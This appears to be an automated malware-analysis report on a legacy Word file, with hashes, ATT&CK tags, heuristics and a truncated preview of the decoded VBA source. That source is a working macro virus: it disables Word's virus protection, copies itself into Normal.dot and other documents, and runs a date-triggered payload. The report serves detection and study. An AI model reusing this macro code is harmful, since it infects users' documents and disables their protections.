Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 aabd8a78a3d8f7af…

MALICIOUS

Office (OLE)

40.0 KB Created: 1997-01-30 14:52:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: df7594066866dbe636a36656ed71271e SHA-1: c258f37137a2c646f6d72e1c4f243409b502d84e SHA-256: aabd8a78a3d8f7afa593c9a11d1a4d25e7503beb297e4d46fe9e901d7721a099
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing VBA macros, specifically an AutoOpen macro, which is a strong indicator of malicious intent. The script attempts to initialize stealth functions and conditionally execute further actions based on the date, suggesting a downloader or backdoor functionality. The presence of legacy WordBasic markers and the AutoOpen macro points towards an older, but still potentially dangerous, macro-based attack.

Heuristics 3

  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29088 bytes
SHA-256: 8518244f6b29362b628e17584c46d97e6089494c98bd2f2ef674b63ea2c6babe
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Garmond"
' Long live John Garmond
' Created by NAENBGOURSG
' Greece, x-mas 1998

Option Explicit

Public strTexts(11) As String

Function AlreadyInitialized()

    Dim varVbc As Variant
    
    For Each varVbc In ActiveDocument.VBProject.VBComponents
        If varVbc.Name = "Garmond" Then
            AlreadyInitialized = True
            Exit Function
        End If
    Next varVbc

    AlreadyInitialized = False

End Function

Sub AutoNew()

    Dim blCommunicated As Integer
    Dim strInfDate As String
        
    On Error Resume Next
    
    Options.VirusProtection = False
    
    Open "c:\grmd.cfg" For Input As #1
        
    If Err = 53 Then
        Open "c:\grmd.cfg" For Output As #1
        Print #1, 0
        Print #1, Now
        Close
        Exit Sub
    Else
        Input #1, blCommunicated
        Input #1, strInfDate
        Close
    End If
   
    If blCommunicated Then
        Application.OrganizerDelete Source:="normal.dot", _
        Name:="Garmond", Object:=wdOrganizerObjectProjectItems
        Exit Sub
    End If
    
    NormalTemplate.VBProject.VBComponents("Garmond").Export _
        NormalTemplate.Path & "/~wrl2561.tmp"
    ActiveDocument.VBProject.VBComponents.Import _
        NormalTemplate.Path & "/~wrl2561.tmp"
    Kill NormalTemplate.Path & "/~wrl2561.tmp"
   
    Randomize
    InitStealth
    
    If Month(Now) = 9 And Day(Now) = 27 Then
        SetStrings
        Application.OnTime 0.6, "Communicate"
    End If

End Sub

Sub AutoOpen()

    Dim blCommunicated As Integer
    Dim strInfDate As String
        
    On Error Resume Next
    
    Options.VirusProtection = False
    
    Application.OrganizerCopy _
        Source:=Application.ActiveDocument.FullName, _
        Destination:="Normal.dot", Name:="Garmond", Object:= _
        wdOrganizerObjectProjectItems
    
    Open "c:\grmd.cfg" For Input As #1
    
    If Err = 53 Then
        Open "c:\grmd.cfg" For Output As #1
        Print #1, 0
        Print #1, Now
        Close
        Exit Sub
    Else
        Input #1, blCommunicated
        Input #1, strInfDate
        Close
    End If
    
    If blCommunicated Then
        Application.OrganizerDelete Source:="normal.dot", _
        Name:="Garmond", Object:=wdOrganizerObjectProjectItems
        Exit Sub
    End If
    
    Randomize
    InitStealth
    
    If Not AlreadyInitialized Then
        NormalTemplate.VBProject.VBComponents("Garmond").Export _
            NormalTemplate.Path & "/~wrl2561.tmp"
        ActiveDocument.VBProject.VBComponents.Import _
            NormalTemplate.Path & "/~wrl2561.tmp"
        Kill NormalTemplate.Path & "/~wrl2561.tmp"
    End If
    
    If Month(Now) Mod 3 = 0 And Day(Now) = 28 Then
        SetStrings
        Application.OnTime 0.6, "Communicate"
    End If

End Sub

Sub Communicate()
Attribute Communicate.VB_Description = "Makro aufgezeichnet am 14.09.99 von Bernd Liebermann"
Attribute Communicate.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.Makro1"

On Error Resume Next

Static intIndex As Integer
Dim intDelay As Long, i As Long, j As Long, tmp As Double

For i = 1 To Len(strTexts(intIndex))
    Selection.TypeText Mid(strTexts(intIndex), i, 1)
    intDelay = Int(25000 * Rnd)
    j = 0
    Do
        j = j + 1
        tmp = 2 ^ 0.5
    Loop Until j = intDelay
Next i

intIndex = intIndex + 1
Select Case intIndex
Case 1
    Application.OnTime Now + TimeValue("00:00:04"), "Communicate"
Case 2
    Application.OnTime Now + TimeValue("00:00:08"), "Communicate"
Case 3
    Application.OnTime Now + TimeValue("00:00:09"), "Communicate"
Case 4
    Application.OnTime Now + TimeValue("00:00:07"), "Communicate"
Case 5
    Application.OnTime 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.